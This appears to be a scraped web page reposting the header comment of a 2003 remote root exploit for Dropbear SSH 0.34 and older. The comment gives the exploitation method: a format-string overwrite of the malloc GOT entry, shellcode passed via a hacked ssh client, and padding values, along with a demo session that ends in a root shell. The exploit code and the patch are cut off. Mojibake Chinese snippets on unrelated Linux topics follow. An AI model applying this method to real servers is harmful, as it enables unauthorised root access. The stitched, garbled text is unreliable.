Linux x86 Dropbear SSH <= 0.34 remote root exploit
/*
* /*
* Linux x86 Dropbear SSH <= 0.34 remote root exploit
* coded by live
*
* You'll need a hacked ssh client to try this out. I included a patch
* to openssh-3.6.p1 somewhere below this comment.
*
* The point is: the buffer being exploited is too small(25 bytes) to hold our
* shellcode, so a workaround was needed in order to send it. What I did here
* was to hack the ssh client so that it sends the local environment variable
* SHELLCODE as ssh's methodname string. This method was described by Joel
* Eriksson @ 0xbadc0ded.org.
*
* The 25 bytes limitation is also the reason for the the strange ``2 byte''
* retaddr you will see here. That's not enough for complete pointer overwrite,
* so I decided to overwrite 3rd and 2nd bytes and hope our shellcode is
* around ;)
*
* % telnet localhost 22
* Trying 127.0.0.1...
* Connected to localhost.
* Escape character is '^]'.
* SSH-2.0-dropbear_0.34
* ^]
* telnet> quit
* Connection closed.
*
* % objdump -R /usr/local/sbin/dropbear| grep malloc
* 080673bc R_386_JUMP_SLOT malloc
*
* % drop-root -v24 localhost
* ?.2022u%24$hn@localhost's password:
* Connection closed by 127.0.0.1
*
* % telnet localhost 10275
* Trying 127.0.0.1...
* Connected to localhost.
* Escape character is '^]'.
* id; exit;
* uid=0(root) gid=0(root) groups=0(root)
* Connection closed by foreign host.
*
* In the above example we were able to lookup a suitable .got entry(used as
* retloc here), but this may not be true under a hostile environment. If
* exploiting this remotely I feel like chances would be greater if we attack
* the stack, but that's just a guess.
*
* Version pad is 24 to 0.34, 12 to 0.32. I don't know about other versions.
*
* gr33tz: ppro, alcaloide and friends.
*
* 21.08.2003
* Please do not distribute
*/
/*
--- sshconnect2.c2003-08-21 21:34:03.000000000 -0300
+++ sshconnect2.c.hack2003-08-21 21:33:47.000000
Ïà¹ØÎĵµ£º
¼üÅÌÔÚËùÓеÄÇý¶¯Ö®ÖÐ×îΪ¼òµ¥µÄÒ»ÖÖ£¬µ«ËüÈ´°üº¬ÁËÇý¶¯µÄ»ù±¾¿ò¼Ü£¬¶ÔÒÔºó¼ÌÐøÉîÈëѧϰÆäËû¸´ÔÓµÄÇý¶¯´óÓÐñÔÒæ£¬ÒÔϱãΪÄãÖð²½ÆÊÎöÇý¶¯µÄ¿ª·¢¡£²ÉÓõÄÊDzéѯ·½Ê½¡£×ªÔØÇë×¢Ã÷³ö´¦£ºqiangren.blog.edu.cn
Ò».ÄÚºËÄ£¿éµÄ×¢²áºÍ³·Ïú
ÔÚ¼ÓÔØÄ£¿éµÄʱºò£¬Ê×ÏÈÔËÐеÄÊÇÄÚºËÄ£¿éµÄ×¢²áº¯Êý¡£ËüµÄ¹¦ÄܰüÀ¨ÄÚºË×¢²áÉ豸ÒÔ ......
4ÔÂ19ÈÕ£¬²Ù×÷½çÃæ½â¾ö·½°¸ÌṩÉÌSynaptics Inc.Ðû²¼ÁËÒ»Ì×ÓÃÓÚLinuxϵ統µÄ Synaptics Gesture Suite¿ª·¢Ì××°£¨SGS-L£©£¬Õâ¿îÈí¼þ½«´ø¸ø¿ªÔ´LinuxϵͳÒÔ¶àµã´¥ÃþµÄÄÜÁ¦¡£
SGS-LÖ§³Ö眾¶àµÄLinux·¢ÐаæÈçFedora, Millos Linpus, Red Flag, SuSE, UbuntuºÍXandros£¬並ÌØ別Ìá¼°¿ÉÍØÕ¹Chrome OSµÄй¦Ä ......
¡¡¡¡vi/vim ÖпÉÒÔʹÓà :s ÃüÁîÀ´Ìæ»»×Ö·û´®¡£ÒÔǰֻ»áʹÓÃÒ»ÖÖ¸ñʽÀ´È«ÎÄÌæ»»£¬½ñÌì·¢ÏÖ¸ÃÃüÁîÓкܶàÖÖд·¨(vi ÕæÊÇÇ¿´ó°¡£¬»¹ÓкܶàÐèҪѧϰ)£¬¼Ç¼¼¸ÖÖÔÚ´Ë£¬·½±ãÒÔºó²éѯ¡£
¡¡¡¡:s/vivian/sky/ Ìæ»»µ±Ç°ÐеÚÒ»¸ö vivian Ϊ sky
¡¡¡¡:s/vivian/sky/g Ìæ»»µ±Ç°ÐÐËùÓÐ vivian Ϊ sky
¡¡¡¡:n,$s/vivian/sky/ Ìæ»»µÚ n ÐÐ ......
ÒÔǰGodaddyµÄLinuxµÄÖ÷»úÊDz»ÄÜ¿ªÍ¨SSHµÄ£¬Ö»ÓÐVDS¡¢VPS¡¢¶ÀÁ¢Ö÷»ú¿ÉÒÔ¿ªÍ¨£¬Ç°¼¸ÌìÔÚºǫ́ÉÏ¿´µ½ÓÐÁËSSHÕâ¸ö¹¦ÄÜ£¬²»¹ýÐèҪɾ³ýËùÓеÄÊý¾Ý¿â£¬²Å¿ÉÒÔ½øÐпªÍ¨µÄ²½Ö衣ǿÁÒ½¨Ò鱸·ÝÊý¾Ý¿â¼°ÍøÕ¾£¡£¡
ɾ³ýÊý¾Ý¿â¾Í²»ÓÃ˵ÁË¡«ºÜ¼òµ¥¡£
²½Ö裺½øÈë¿Õ¼ä¹ÜÀíÃæ°å£¬Ñ¡ÔñSettingsÑ¡ÏϵÄSSHÑ¡ÏÈçÏÂͼ£º
godaddyssh-thumb. ......
1 ¾³£ÐèÒª¿Ì¼ ISO Îļþ£¬cdrecord ¿ÉÒÔʵÏÖ
cdrecord ÆäʵÊÇÒ»¸öÈíÁ´½Ó
lrwxrwxrwx 1 root root 5 2009-05-04 22:42 /usr/bin/cdrecord -> wodim
¿Ì¼µÄÃüÁîÈçÏ£º
wodim -v dev=6,0,0 xx.iso # dev ¿ÉÒÔÓà --scanbus ²é¿´
2 ......